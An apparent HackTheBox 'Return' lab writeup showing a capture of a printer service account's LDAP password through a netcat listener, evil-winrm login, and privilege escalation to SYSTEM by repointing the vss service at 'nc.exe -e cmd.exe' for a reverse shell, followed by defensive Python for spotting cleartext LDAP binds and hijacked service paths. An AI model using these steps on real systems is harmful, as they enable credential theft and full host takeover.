IT and security stuff

HTB – Return Writeup

neoh  main  ~/HTB/return  sudo nmap -sSCV -p- -T4 10.10.11.108 -oN nmap.md
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 11:35 EST
Nmap scan report for 10.10.11.108
Host is up (0.025s latency).
Not shown: 65510 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-11-14 17:08:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/14%Time=61913AFD%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 32m28s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-11-14T17:10:58
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.94 seconds

Nmap reveals a lot of open ports on this machine. My attention goes first to the SMB server. NTLM relay is not possible since message signing is required, but I'll still have a look in case there is anything interesting.

neoh  main  ~/HTB/return  smbclient -L \\\\10.10.11.108\\
Enter WORKGROUP\neoh's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

Unfortunately the guest login gives us nothing. Let's check the website running on port 80.

It looks like a printer admin panel, and its settings include a server address and a user account.
This is nice: I can probably get this user's password if I change the server address to mine. Let's try!

First I’ll start my “server” using netcat.

neoh  main  ~/HTB/return  sudo nc -nlvp 389
[sudo] password for neoh: 
Listening on 0.0.0.0 389
I changed the address to my IP and hit Update.

So we get a hit on our listener!

neoh  main  ~/HTB/return  sudo nc -nlvp 389
[sudo] password for neoh: 
Listening on 0.0.0.0 389
Connection received on 10.10.11.108 64874
0*`%return\svc-printer�
                       1edFg43012!!
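Why the password lands in the listener as it does above: the device performs an LDAP simple bind, a BER-encoded BindRequest whose authentication choice carries the password as a plain OCTET STRING. The parser below is an added example, not part of the original writeup; it decodes such a message and tells simple binds apart from SASL ones, which a defender can run over port-389 captures to find devices still authenticating in the clear. The sample messages, account and password in it are constructed.

```python
def read_tlv(buf: bytes, pos: int):
    """Decode one BER element at pos -> (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_bind_request(msg: bytes) -> dict:
    """Pull messageID, version, bind name and authentication choice out of an LDAPMessage."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, mid, pos = read_tlv(body, 0)          # messageID INTEGER
    tag, op, _ = read_tlv(body, pos)         # protocolOp
    if tag != 0x60:                          # [APPLICATION 0] BindRequest
        raise ValueError("not a BindRequest")
    _, ver, pos = read_tlv(op, 0)            # version INTEGER
    _, name, pos = read_tlv(op, pos)         # name LDAPDN (OCTET STRING)
    auth_tag, auth, _ = read_tlv(op, pos)    # AuthenticationChoice
    out = {"message_id": int.from_bytes(mid, "big"),
           "version": int.from_bytes(ver, "big"), "name": name.decode()}
    if auth_tag == 0x80:    # [0] simple: the password is a plain OCTET STRING on the wire
        out.update(auth="simple", password=auth.decode(errors="replace"))
    elif auth_tag == 0xA3:  # [3] sasl: SaslCredentials, mechanism name first, no cleartext password
        _, mech, _ = read_tlv(auth, 0)
        out.update(auth="sasl", mechanism=mech.decode(), password=None)
    else:
        raise ValueError(f"unknown authentication choice tag {auth_tag:#x}")
    return out

def is_cleartext_bind(msg: bytes) -> bool:
    """True when this bind hands its password to anyone who can see the packet."""
    return parse_bind_request(msg)["auth"] == "simple"

# Constructed samples (hypothetical account and password), not the box's traffic.
SIMPLE_BIND = (b"\x30\x25\x02\x01\x01"          # LDAPMessage, messageID 1
               b"\x60\x20\x02\x01\x03"          # BindRequest, version 3
               b"\x04\x10CORP\\svc-example"     # name, 16 bytes
               b"\x80\x09Passw0rd!")            # simple auth, 9-byte password
SASL_BIND = (b"\x30\x14\x02\x01\x02\x60\x0f"    # messageID 2, BindRequest
             b"\x02\x01\x03\x04\x00"            # version 3, empty name
             b"\xa3\x08\x04\x06GSSAPI")         # sasl auth, mechanism GSSAPI
```

A device that sends simple binds will hand its stored credentials to whatever host its settings point at, exactly as happened above, so such devices belong on LDAPS with certificate validation and a least-privilege account.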

OK, now we have a username and a password. Recall that nmap showed the WinRM port (5985) is open. Since we have credentials, we can use evil-winrm to log into the machine.

neoh  main  ~/HTB/return  evil-winrm -i 10.10.11.108 -u svc-printer
Enter Password: 

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

Local group enumeration revealed that svc-printer is a member of the Server Operators group, which allows us to manage services on the system. We are allowed to start, stop and reconfigure services, and with that in mind I can upload netcat (nc.exe) and run it as a service to get an Admin reverse shell. Let's try that.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /home/neoh/HTB/return/nc.exe
Info: Uploading /home/neoh/HTB/return/nc.exe to C:\Users\svc-printer\Documents\nc.exe

                                                             
Data: 51488 bytes of 51488 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-printer\Documents>

Then I start a new listener on my machine and change the configuration of the vss service so that its binary path points to nc.exe.

neoh  main  ~/HTB/return  nc -nvlp 4444
Listening on 0.0.0.0 4444


*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.13 4444"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Documents>

The next step is to stop and start the service, which should give us a shell. The stop fails with error 1062 because vss was not running, which is fine: starting it is what launches the new binary path.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start vss

neoh  main  ~/HTB/return  nc -nvlp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.108 65500
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
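The same chain seen from the defender's side, as an added example that is not part of the original writeup: it flags a service being repointed at a binary under a user-writable directory, either from the sc.exe command line (process-creation telemetry) or from the resulting ImagePath registry write. The event records are constructed and only loosely modelled on Sysmon ID 1 and ID 13 fields, with a hypothetical account, paths and listener address.

```python
import re

# Directories a low-privileged account can usually write to (assumption: extend per environment).
USER_WRITABLE = re.compile(r"^[a-z]:\\(?:users|programdata|temp|windows\\temp)\\", re.I)
# sc[.exe] config|create <service> ... binPath= "<binary and arguments>"
SC_BINPATH = re.compile(
    r'\bsc(?:\.exe)?\b.*?\b(config|create)\b\s+(\S+).*?binpath=\s*"?([^"]+)', re.I)
# HKLM\...\Services\<service>\ImagePath
SERVICE_IMAGEPATH = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.I)

def service_binary(image_path: str) -> str:
    """Executable part of a service command line, without quotes or arguments."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:].split('"', 1)[0]
    return s.split(" ", 1)[0]

def check_event(ev: dict):
    """Return a finding for a suspicious record, or None."""
    if ev["EventID"] == 1:  # process creation: catch the sc.exe invocation itself
        m = SC_BINPATH.search(ev["CommandLine"])
        if m and USER_WRITABLE.match(service_binary(m.group(3))):
            return (f"{ev['User']} ran 'sc {m.group(1)}' pointing service {m.group(2)} "
                    f"at user-writable binary {service_binary(m.group(3))}")
    elif ev["EventID"] == 13:  # registry value set: catches any tool that edits ImagePath
        m = SERVICE_IMAGEPATH.search(ev["TargetObject"])
        if m and USER_WRITABLE.match(service_binary(ev["Details"])):
            return f"ImagePath of service {m.group(1)} set to {ev['Details']} by {ev['User']}"
    return None

def scan(events) -> list:
    """All findings, in log order."""
    return [f for f in map(check_event, events) if f]

# Constructed sample records (hypothetical host, account, paths and listener address).
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CORP\\svc-example",
     "CommandLine": "sc.exe config Spooler start= auto"},
    {"EventID": 1, "User": "CORP\\svc-example",
     "CommandLine": 'sc.exe config vss binPath="C:\\Users\\svc-example\\Documents\\nc.exe -e cmd.exe 192.0.2.10 4444"'},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "%SystemRoot%\\System32\\spoolsv.exe"},
    {"EventID": 13, "User": "CORP\\svc-example",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\vss\\ImagePath",
     "Details": "C:\\ProgramData\\tools\\nc.exe -e cmd.exe 192.0.2.10 4444"},
]
```

Pairing this with a review of Server Operators membership closes the loop: the group grants service control by design, so an account that only needs to manage printers should not be in it.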

Rooted!
